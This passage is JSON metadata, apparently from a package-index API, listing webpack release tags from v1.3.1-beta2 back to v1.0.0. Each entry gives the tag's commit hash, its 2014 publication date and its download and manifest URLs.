yste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwe